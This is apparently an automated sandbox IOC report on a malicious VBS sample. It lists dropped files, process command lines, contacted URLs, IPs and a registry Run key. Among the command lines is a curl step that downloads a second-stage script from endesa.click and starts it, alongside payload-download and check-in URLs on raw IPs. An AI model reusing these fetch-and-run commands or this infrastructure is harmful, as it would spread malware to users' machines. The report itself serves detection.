IOC Report
672365339196e.vbs

loading gif

Files

File Path
Type
Category
Malicious
672365339196e.vbs
ASCII text, with CRLF line terminators
initial sample
malicious
C:\Users\Public\6723653391970.vbs
ASCII text, with CRLF line terminators
modified
malicious
C:\Users\user\AppData\Local\Temp\hcx.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\_672365339188b\7zxa.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\_672365339188b\BLOCKBUSTER.exe
PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
dropped
malicious
C:\_672365339188b\unrar.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\wewewe[1].zip
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
Composite Document File V2 Document, Cannot read section info
dropped
C:\_672365339188b\BLOCKBUSTER.dll
data
dropped
C:\_672365339188b\MPDK.bat
ASCII text, with CRLF line terminators
modified
C:\_672365339188b\downloaded.zip
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
\Device\ConDrv
ASCII text, with CR, LF line terminators
dropped
There are 2 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\672365339196e.vbs"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6723653391970.vbs https://endesa.click/672365339188b/6723653391970.vbs
malicious
C:\Windows\System32\curl.exe
curl -k -o C:\Users\Public\6723653391970.vbs https://endesa.click/672365339188b/6723653391970.vbs
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6723653391970.vbs
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\6723653391970.vbs"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6723653391970.vbs
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\6723653391970.vbs"
malicious
C:\_672365339188b\BLOCKBUSTER.exe
"C:\_672365339188b\BLOCKBUSTER.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
malicious
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c ipconfig /flushdns
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im BLOCKBUSTER.exe
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im BLOCKBUSTER.exe
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
malicious
C:\Windows\SysWOW64\ipconfig.exe
ipconfig /flushdns
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im BLOCKBUSTER.exe
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im BLOCKBUSTER.exe
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im BLOCKBUSTER.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im BLOCKBUSTER.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im BLOCKBUSTER.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im BLOCKBUSTER.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im BLOCKBUSTER.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im BLOCKBUSTER.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im BLOCKBUSTER.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im BLOCKBUSTER.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im BLOCKBUSTER.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im BLOCKBUSTER.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im BLOCKBUSTER.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im BLOCKBUSTER.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im BLOCKBUSTER.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im BLOCKBUSTER.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im BLOCKBUSTER.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im BLOCKBUSTER.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im BLOCKBUSTER.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im BLOCKBUSTER.exe
malicious
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
malicious
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im BLOCKBUSTER.exe
malicious
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im BLOCKBUSTER.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im BLOCKBUSTER.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im BLOCKBUSTER.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 60 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://tgb5255365e.servegame.com:2530/
70.34.247.142
malicious
http://64.95.10.38/wewewe.zip
64.95.10.38
malicious
https://endesa.cli
unknown
malicious
http://64.95.10.38/contador/index.php?nomepc=user-PC
64.95.10.38
malicious
http://www.ghisler.com/plugins.htm
unknown
http://www.scootersoftware.com. 
unknown
http://www.scootersoftware.com/checkupdates.php?product=bc3&minor=
unknown
http://www.pngui.com/%E8%B4%AD%E4%B9%B0ordersU
unknown
http://www.embarcadero.com/products/delphi
unknown
http://www.scootersoftware.com/bugRepMailer.php
unknown
http://www.scootersoftware.com/upgradee/
unknown
https://endesa.click/672365339188b/6723653391970.vbs
68.65.122.45
http://worldtimeapi.org/api/ip
unknown
http://www.totalcmd.net/directory/packer.html
unknown
http://www.indyproject.org/
unknown
https://endesa.clic
unknown
http://www.scootersoftware.com/buynow?bld=%dS
unknown
http://64.95.10.38/contador/index.php?nomepc=user-PC_Classes
unknown
http://www.scootersoftware.com/upgrade
unknown
http://www.scootersoftware.com/
unknown
http://www.scootersoftware.com/buynow?bld=%d
unknown
http://70.34.247.142/UPLOADMAISL.phpU
unknown
http://www.scootersoftware.com/support.php
unknown
http://64.95.10.38/wewewe.zipj
unknown
https://endesa.click/672365339188b/6723653391970.vbsWinsta0
unknown
https://endesa.click/672365339188b/6723653391970.vbscurl
unknown
http://www.scootersoftware.com/download.phpS
unknown
http://www.scootersoftware.com/download.php
unknown
http://worldtimeapi.org/api/ip=C:
unknown
http://64.95.10.38/contador/index.php?nomepc=
unknown
https://endesa.click/672365339188b/6723653391970.vbs~E
unknown
http://www.scootersoftware.com/v3formats
unknown
http://www.scootersoftware.com/upgradeite
unknown
http://www.secureblackbox.com
unknown
http://64.95.10.38/wewewe.zip5EE
unknown
http://www.scootersoftware.com/upgrade0
unknown
There are 26 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
tgb5255365e.servegame.com
70.34.247.142
malicious
endesa.click
68.65.122.45
worldtimeapi.org
213.188.196.246

IPs

IP
Domain
Country
Malicious
70.34.247.142
tgb5255365e.servegame.com
United States
malicious
64.95.10.38
unknown
United States
malicious
127.0.0.1
unknown
unknown
malicious
213.188.196.246
worldtimeapi.org
Italy
68.65.122.45
endesa.click
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{E88DCCE0-B7B3-11D1-A9F0-00AA0060FA31} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories64\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\Enum
Implementing
HKEY_CURRENT_USER\SOFTWARE\Scooter Software\Beyond Compare 3
CacheID
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
BLOCKBUSTER

Memdumps

Base Address
Regiontype
Protect
Malicious
B5BC000
direct allocation
page read and write
2A55000
heap
page read and write
28C4A0AC000
heap
page read and write
28C49F62000
heap
page read and write
A256000
direct allocation
page read and write
28C48248000
heap
page read and write
CC70000
trusted library allocation
page read and write
28C48D08000
heap
page read and write
68D8000
unkown
page execute read
2C61000
heap
page read and write
28C48CE8000
heap
page read and write
28C492ED000
heap
page read and write
28C4A238000
heap
page read and write
B6C2000
direct allocation
page read and write
955A000
unkown
page readonly
94FC000
unkown
page readonly
3330000
heap
page read and write
331F000
unkown
page read and write
2C61000
heap
page read and write
1C44D3AE000
heap
page read and write
2C61000
heap
page read and write
2B41000
direct allocation
page read and write
28C48458000
heap
page read and write
42C000
unkown
page execute read
1C44D3A5000
heap
page read and write
28C4A7E4000
heap
page read and write
28C4932E000
heap
page read and write
28C4A0AC000
heap
page read and write
2C61000
heap
page read and write
28C49898000
heap
page read and write
23979970000
heap
page read and write
3367000
heap
page read and write
297B000
heap
page read and write
1C44D4B0000
remote allocation
page read and write
2C61000
heap
page read and write
28C47F82000
heap
page read and write
28C48D07000
heap
page read and write
28C48CE6000
heap
page read and write
28C4A48B000
heap
page read and write
9292000
unkown
page read and write
950F000
unkown
page readonly
28C49DD7000
heap
page read and write
28C47F41000
heap
page read and write
A85E000
stack
page read and write
928B000
unkown
page write copy
A2F0000
direct allocation
page read and write
28C42E50000
heap
page read and write
23979A1D000
heap
page read and write
EC0000
heap
page read and write
278D000
stack
page read and write
2740000
heap
page read and write
28C49478000
heap
page read and write
2DEE000
stack
page read and write
2B4D000
stack
page read and write
122FF000
heap
page read and write
3210000
heap
page read and write
32C9000
heap
page read and write
95E8000
unkown
page readonly
28C4246E000
heap
page read and write
28C4A760000
heap
page read and write
28C423FA000
heap
page read and write
28C488DC000
heap
page read and write
28C4A48A000
heap
page read and write
2FE9000
heap
page read and write
28C484DC000
heap
page read and write
2C61000
heap
page read and write
B6C9000
direct allocation
page read and write
28C493B2000
heap
page read and write
95A2000
unkown
page readonly
B5CB000
direct allocation
page read and write
28C48D18000
heap
page read and write
9187000
unkown
page write copy
A5F9000
direct allocation
page read and write
2A8E000
stack
page read and write
2C61000
heap
page read and write
2A4F000
unkown
page read and write
28C48750000
heap
page read and write
220D7090000
heap
page read and write
ACF000
unkown
page read and write
330F000
unkown
page read and write
2C61000
heap
page read and write
B0A000
unkown
page read and write
1C44D3F4000
heap
page read and write
28C48D07000
heap
page read and write
28C48816000
heap
page read and write
2AF0000
direct allocation
page read and write
28C423F6000
heap
page read and write
220D37C0000
heap
page read and write
2C61000
heap
page read and write
967F000
unkown
page readonly
28C48D07000
heap
page read and write
EB3000
heap
page read and write
28C4A4CC000
heap
page read and write
28C4A868000
heap
page read and write
28C48582000
heap
page read and write
2C61000
heap
page read and write
956A000
unkown
page readonly
23979A00000
heap
page read and write
28C49D94000
heap
page read and write
2C61000
heap
page read and write
2767000
heap
page read and write
2C61000
heap
page read and write
E61000
heap
page read and write
28C4A1B4000
heap
page read and write
E0E000
stack
page read and write
28C496CA000
heap
page read and write
2AA0000
direct allocation
page read and write
9533000
unkown
page readonly
95FC000
unkown
page readonly
2790000
heap
page read and write
28C48D07000
heap
page read and write
2CB0000
heap
page read and write
28C4246E000
heap
page read and write
2C61000
heap
page read and write
23E0000
heap
page read and write
2830000
heap
page read and write
2C61000
heap
page read and write
38A0000
heap
page read and write
28C423FD000
heap
page read and write
276A000
heap
page read and write
D7F5000
heap
page read and write
2780000
heap
page read and write
A211000
direct allocation
page read and write
2C61000
heap
page read and write
28C48AAA000
heap
page read and write
2A90000
direct allocation
page read and write
28C4A658000
heap
page read and write
2990000
heap
page read and write
A1CC000
direct allocation
page read and write
963B000
unkown
page readonly
B13000
unkown
page read and write
28C49BB0000
heap
page read and write
5481000
unkown
page execute read
28C4911E000
heap
page read and write
3260000
heap
page read and write
28C4A7E4000
heap
page read and write
2FCD000
stack
page read and write
3F76AFA000
stack
page read and write
2860000
heap
page read and write
2C61000
heap
page read and write
1C44D290000
heap
page read and write
28C48D13000
heap
page read and write
2C80000
heap
page read and write
2C61000
heap
page read and write
28C48E06000
heap
page read and write
2A30000
heap
page read and write
28C48D08000
heap
page read and write
28C4A383000
heap
page read and write
28C48A26000
heap
page read and write
28C49FA4000
heap
page read and write
91C0000
unkown
page read and write
9639000
unkown
page readonly
2390000
heap
page read and write
28C4808A000
heap
page read and write
28C48D08000
heap
page read and write
2EED000
stack
page read and write
2C61000
heap
page read and write
23979A35000
heap
page read and write
28C4A92E000
heap
page read and write
28C48CD0000
heap
page read and write
2FCF000
heap
page read and write
231C000
stack
page read and write
220D3840000
heap
page read and write
28C48D08000
heap
page read and write
3356000
heap
page read and write
2CB0000
heap
page read and write
23F0000
heap
page read and write
2C80000
heap
page read and write
3330000
heap
page read and write
1C44D3AD000
heap
page read and write
6C87000
unkown
page execute read
28C49814000
heap
page read and write
28C491A2000
heap
page read and write
2C61000
heap
page read and write
28C49C34000
heap
page read and write
2C61000
heap
page read and write
28C49E5A000
heap
page read and write
2C61000
heap
page read and write
28C4A7E4000
heap
page read and write
28C423EB000
heap
page read and write
2B39000
direct allocation
page read and write
33AA000
heap
page read and write
2C61000
heap
page read and write
28C48D01000
heap
page read and write
28E0000
heap
page read and write
28C48CFE000
heap
page read and write
3040000
heap
page read and write
28C48D08000
heap
page read and write
1303C000
stack
page read and write
2390000
heap
page read and write
2C61000
heap
page read and write
AE07000
stack
page read and write
7CB6000
unkown
page execute read
E3E000
heap
page read and write
28C4246E000
heap
page read and write
28BE000
unkown
page read and write
A52A000
direct allocation
page read and write
F29000
heap
page read and write
9289000
unkown
page read and write
AF5E000
stack
page read and write
CC30000
direct allocation
page execute and read and write
5410000
heap
page read and write
2C61000
heap
page read and write
2B6C000
direct allocation
page read and write
2C61000
heap
page read and write
3490000
heap
page read and write
2AAE000
direct allocation
page read and write
28C4A407000
heap
page read and write
2C61000
heap
page read and write
2B30000
heap
page read and write
1A0000
heap
page read and write
28C49580000
heap
page read and write
2DB0000
heap
page read and write
94F5000
unkown
page readonly
28C495C2000
heap
page read and write
27F0000
heap
page read and write
6FCF5000
unkown
page readonly
2270000
heap
page read and write
2C61000
heap
page read and write
1C44D530000
heap
page read and write
28C498DA000
heap
page read and write
D5C4000
direct allocation
page read and write
31F0000
heap
page read and write
9550000
unkown
page readonly
DC0000
heap
page read and write
9619000
unkown
page readonly
32B6000
heap
page read and write
2C61000
heap
page read and write
950D000
unkown
page readonly
AF10000
remote allocation
page read and write
387F000
stack
page read and write
91A2000
unkown
page write copy
28C48D82000
heap
page read and write
3630000
heap
page read and write
6FD02000
unkown
page readonly
28C49E18000
heap
page read and write
EC2000
heap
page read and write
38A0000
heap
page read and write
9625000
unkown
page readonly
95B1000
unkown
page readonly
2C61000
heap
page read and write
D88E000
heap
page read and write
1C44D490000
heap
page read and write
220D5330000
heap
page read and write
28C48D04000
heap
page read and write
23DE000
stack
page read and write
9560000
unkown
page readonly
28C4A760000
heap
page read and write
28C4870E000
heap
page read and write
B34E000
stack
page read and write
28C4A69B000
heap
page read and write
239799E0000
heap
page read and write
28C48392000
heap
page read and write
B648000
direct allocation
page read and write
28C4A406000
heap
page read and write
28C48F92000
heap
page read and write
2B0D000
direct allocation
page read and write
273B000
heap
page read and write
2897000
heap
page read and write
28C423EB000
heap
page read and write
953D000
unkown
page readonly
3000000
heap
page read and write
28C48CDC000
heap
page read and write
32C9000
heap
page read and write
270E000
unkown
page read and write
A430000
direct allocation
page read and write
A22F000
direct allocation
page read and write
28C48648000
heap
page read and write
2C61000
heap
page read and write
28C48B2E000
heap
page read and write
220D37DE000
heap
page read and write
3367000
heap
page read and write
2C61000
heap
page read and write
9163000
unkown
page write copy
28C423FB000
heap
page read and write
2C61000
heap
page read and write
A1B0000
direct allocation
page read and write
6FCFF000
unkown
page read and write
2C61000
heap
page read and write
64FF000
unkown
page execute read
28C48CE2000
heap
page read and write
AF10000
trusted library allocation
page read and write
2C61000
heap
page read and write
B64B000
direct allocation
page read and write
8AC0000
unkown
page execute read
2B10000
heap
page read and write
28C488DC000
heap
page read and write
2C61000
heap
page read and write
401000
unkown
page execute read
CC70000
trusted library allocation
page read and write
2C61000
heap
page read and write
2FF0000
heap
page read and write
28C48D0B000
heap
page read and write
23979A2B000
heap
page read and write
2C61000
heap
page read and write
28C48A68000
heap
page read and write
1C44D390000
heap
page read and write
2C61000
heap
page read and write
D40000
heap
page read and write
2AFD000
stack
page read and write
28C48141000
heap
page read and write
28C48DC4000
heap
page read and write
28C481C4000
heap
page read and write
B95A2FF000
stack
page read and write
28C4A448000
heap
page read and write
28C4991D000
heap
page read and write
2C61000
heap
page read and write
D874000
heap
page read and write
D7EB000
heap
page read and write
9175000
unkown
page write copy
501F5FE000
stack
page read and write
28C48F92000
heap
page read and write
28C48351000
heap
page read and write
EB4000
heap
page read and write
2AD0000
heap
page read and write
D8C0000
heap
page read and write
28C48CE3000
heap
page read and write
28C48CDC000
heap
page read and write
A0F6000
unkown
page readonly
23979A0E000
heap
page read and write
2A00000
heap
page read and write
9296000
unkown
page readonly
95FE000
unkown
page readonly
2767000
heap
page read and write
23F0000
heap
page read and write
A750000
heap
page read and write
916F000
unkown
page read and write
8E000
stack
page read and write
28C4830E000
heap
page read and write
28C48CEC000
heap
page read and write
2C61000
heap
page read and write
1C44D4B0000
remote allocation
page read and write
2A60000
heap
page read and write
2C61000
heap
page read and write
122E1000
heap
page read and write
2C61000
heap
page read and write
32F0000
heap
page read and write
28C48416000
heap
page read and write
28C4A9C3000
heap
page read and write
28C485C4000
heap
page read and write
28C4A3C4000
heap
page read and write
28C48CDC000
heap
page read and write
28C4A4CC000
heap
page read and write
2C61000
heap
page read and write
28C4A970000
heap
page read and write
1C44D3C9000
heap
page read and write
2C61000
heap
page read and write
28F7000
heap
page read and write
2C61000
heap
page read and write
2CB0000
heap
page read and write
28C49E9C000
heap
page read and write
2C61000
heap
page read and write
28C492EC000
heap
page read and write
23979A0E000
heap
page read and write
28C4246E000
heap
page read and write
11FF000
stack
page read and write
7808000
unkown
page execute read
A274000
direct allocation
page read and write
2B5D000
direct allocation
page read and write
B16000
unkown
page read and write
28C48D10000
heap
page read and write
6E3C000
unkown
page execute read
34B0000
heap
page read and write
ACB000
unkown
page read and write
227D000
stack
page read and write
2AA7000
direct allocation
page read and write
28C4991C000
heap
page read and write
220D5334000
heap
page read and write
28C491E4000
heap
page read and write
AEC000
unkown
page write copy
28C48858000
heap
page read and write
28C497D2000
heap
page read and write
28C4A970000
heap
page read and write
D843000
heap
page read and write
2C61000
heap
page read and write
9623000
unkown
page readonly
966A000
unkown
page readonly
26FD000
stack
page read and write
80C0000
unkown
page execute read
963F000
unkown
page readonly
23979A34000
heap
page read and write
28C48D13000
heap
page read and write
1C44D40D000
heap
page read and write
B1C000
unkown
page read and write
1C44D3E4000
heap
page read and write
2870000
heap
page read and write
2C60000
heap
page read and write
23979A1B000
heap
page read and write
33A6000
heap
page read and write
28C4A827000
heap
page read and write
23979A35000
heap
page read and write
28C49B6F000
heap
page read and write
28C48392000
heap
page read and write
23979990000
heap
page read and write
28C482CC000
heap
page read and write
A62E000
direct allocation
page read and write
501F0FF000
stack
page read and write
26FD000
stack
page read and write
1C44D3C9000
heap
page read and write
915D000
unkown
page write copy
9570000
unkown
page readonly
286B000
heap
page read and write
23979A0D000
heap
page read and write
2A1F000
unkown
page read and write
F1B000
heap
page read and write
28C48D0E000
heap
page read and write
D65E000
direct allocation
page read and write
2C61000
heap
page read and write
28C482CC000
heap
page read and write
28C493F4000
heap
page read and write
F02000
heap
page read and write
28C489A2000
heap
page read and write
2C61000
heap
page read and write
12327000
heap
page read and write
289A000
heap
page read and write
79FF000
unkown
page execute read
28C4823F000
heap
page read and write
2D4D000
stack
page read and write
346E000
stack
page read and write
B4EC000
direct allocation
page read and write
B2DD000
stack
page read and write
28C4A658000
heap
page read and write
2C61000
heap
page read and write
95A6000
unkown
page readonly
3230000
heap
page read and write
2C61000
heap
page read and write
9536000
unkown
page readonly
D7FC000
heap
page read and write
28C4304E000
heap
page read and write
23F0000
heap
page read and write
91A7000
unkown
page read and write
2C61000
heap
page read and write
28C492AA000
heap
page read and write
2C61000
heap
page read and write
220D5804000
heap
page read and write
2C61000
heap
page read and write
AB3000
unkown
page read and write
29AA000
heap
page read and write
2C61000
heap
page read and write
28C4A6DC000
heap
page read and write
2730000
heap
page read and write
28C48CFE000
heap
page read and write
FFDD0000
direct allocation
page read and write
28C42411000
heap
page read and write
E30000
heap
page read and write
28C498DA000
heap
page read and write
9171000
unkown
page write copy
2B4F000
direct allocation
page read and write
28C48FD4000
heap
page read and write
9197000
unkown
page write copy
28C48AED000
heap
page read and write
D895000
heap
page read and write
220D37C6000
heap
page read and write
3396000
heap
page read and write
28C49646000
heap
page read and write
2776000
heap
page read and write
5EAC000
unkown
page execute read
48A000
unkown
page execute read
28C4828A000
heap
page read and write
2C61000
heap
page read and write
29A7000
heap
page read and write
2B1C000
direct allocation
page read and write
2C61000
heap
page read and write
2C61000
heap
page read and write
28C49016000
heap
page read and write
2A30000
heap
page read and write
28C4830E000
heap
page read and write
F25000
heap
page read and write
28C476F3000
heap
page read and write
AB3000
unkown
page write copy
2C7B000
heap
page read and write
A6EC000
stack
page read and write
F21000
heap
page read and write
28C4A0EE000
heap
page read and write
23979A2E000
heap
page read and write
2B36000
heap
page read and write
28C48CF8000
heap
page read and write
9563000
unkown
page readonly
1AD000
stack
page read and write
220D37BA000
heap
page read and write
D886000
heap
page read and write
28C42F4F000
heap
page read and write
23979A16000
heap
page read and write
28C48D13000
heap
page read and write
28C490DC000
heap
page read and write
2AE9000
direct allocation
page read and write
28C4A5D4000
heap
page read and write
2C61000
heap
page read and write
B645000
direct allocation
page read and write
A57D000
direct allocation
page read and write
A28B000
direct allocation
page read and write
3F76BFF000
stack
page read and write
28C48D0E000
heap
page read and write
28C423C9000
heap
page read and write
3290000
heap
page read and write
9681000
unkown
page readonly
DC4000
heap
page read and write
28C48CFE000
heap
page read and write
33AA000
heap
page read and write
28FA000
heap
page read and write
960B000
unkown
page readonly
2B06000
direct allocation
page read and write
2A5F000
stack
page read and write
74AF000
unkown
page execute read
28C4849A000
heap
page read and write
28C48CE6000
heap
page read and write
743D000
unkown
page execute read
2F40000
heap
page read and write
35AE000
unkown
page read and write
29ED000
stack
page read and write
29A7000
heap
page read and write
677C000
unkown
page execute read
2C61000
heap
page read and write
D7C5000
heap
page read and write
336A000
heap
page read and write
2C61000
heap
page read and write
2730000
heap
page read and write
ACB000
unkown
page write copy
2A60000
heap
page read and write
B39C000
stack
page read and write
2C61000
heap
page read and write
3250000
heap
page read and write
28C499A0000
heap
page read and write
2FE6000
heap
page read and write
220D37DD000
heap
page read and write
28C4A50F000
heap
page read and write
AF0A000
stack
page read and write
923B000
unkown
page read and write
2C61000
heap
page read and write
B621000
direct allocation
page read and write
7F11000
unkown
page execute read
23979A00000
heap
page read and write
23979A15000
heap
page read and write
28C49436000
heap
page read and write
28C4246E000
heap
page read and write
CC96000
trusted library allocation
page read and write
238D000
stack
page read and write
2F7D000
stack
page read and write
2C61000
heap
page read and write
2D50000
heap
page read and write
2C61000
heap
page read and write
28C4A69A000
heap
page read and write
28C423FA000
heap
page read and write
220D37FC000
heap
page read and write
28C49479000
heap
page read and write
B476000
direct allocation
page read and write
28C487D4000
heap
page read and write
28C48606000
heap
page read and write
2C61000
heap
page read and write
33A7000
heap
page read and write
28C48858000
heap
page read and write
2C61000
heap
page read and write
28C4A448000
heap
page read and write
2E4F000
unkown
page read and write
28C48ECC000
heap
page read and write
314F000
unkown
page read and write
2880000
heap
page read and write
28C49605000
heap
page read and write
2B1B000
heap
page read and write
323C000
heap
page read and write
28C494BA000
heap
page read and write
D50000
heap
page read and write
501ECFA000
stack
page read and write
28C4A50E000
heap
page read and write
A63E000
direct allocation
page read and write
28C483D4000
heap
page read and write
28C49E9C000
heap
page read and write
94F0000
unkown
page readonly
ADF000
unkown
page write copy
54AB000
unkown
page execute and read and write
2C61000
heap
page read and write
2D9E000
unkown
page read and write
E60000
heap
page read and write
35BF000
unkown
page read and write
28C48D15000
heap
page read and write
2AC4000
direct allocation
page read and write
2C61000
heap
page read and write
2700000
heap
page read and write
2C61000
heap
page read and write
28C48D01000
heap
page read and write
3670000
heap
page read and write
28C4849A000
heap
page read and write
76DE000
unkown
page execute read
656C000
unkown
page execute read
9647000
unkown
page readonly
28C4A550000
heap
page read and write
AFD000
unkown
page read and write
28C49EDF000
heap
page read and write
276A000
heap
page read and write
E99000
heap
page read and write
B28000
unkown
page write copy
33FF000
stack
page read and write
28C48D07000
heap
page read and write
28C4A028000
heap
page read and write
2C70000
heap
page read and write
2C61000
heap
page read and write
220D37B9000
heap
page read and write
28C42405000
heap
page read and write
B05F000
stack
page read and write
28C4995E000
heap
page read and write
28C43250000
heap
page read and write
276A000
heap
page read and write
23A0000
heap
page read and write
28C4A1F6000
heap
page read and write
28C48CD7000
heap
page read and write
2397B800000
heap
page read and write
280E000
stack
page read and write
28C48F51000
heap
page read and write
2996000
heap
page read and write
336A000
heap
page read and write
95D9000
unkown
page readonly
23979D95000
heap
page read and write
2AE2000
direct allocation
page read and write
3F76FFF000
stack
page read and write
28C48206000
heap
page read and write
28E0000
heap
page read and write
2BFE000
unkown
page read and write
294E000
unkown
page read and write
2C61000
heap
page read and write
3630000
heap
page read and write
AF10000
trusted library allocation
page read and write
9651000
unkown
page readonly
2AFF000
direct allocation
page read and write
7B4E000
unkown
page execute read
28C4974E000
heap
page read and write
2C61000
heap
page read and write
759C000
unkown
page execute read
91B5000
unkown
page read and write
273D000
stack
page read and write
2B6F000
unkown
page read and write
9246000
unkown
page read and write
EE4000
heap
page read and write
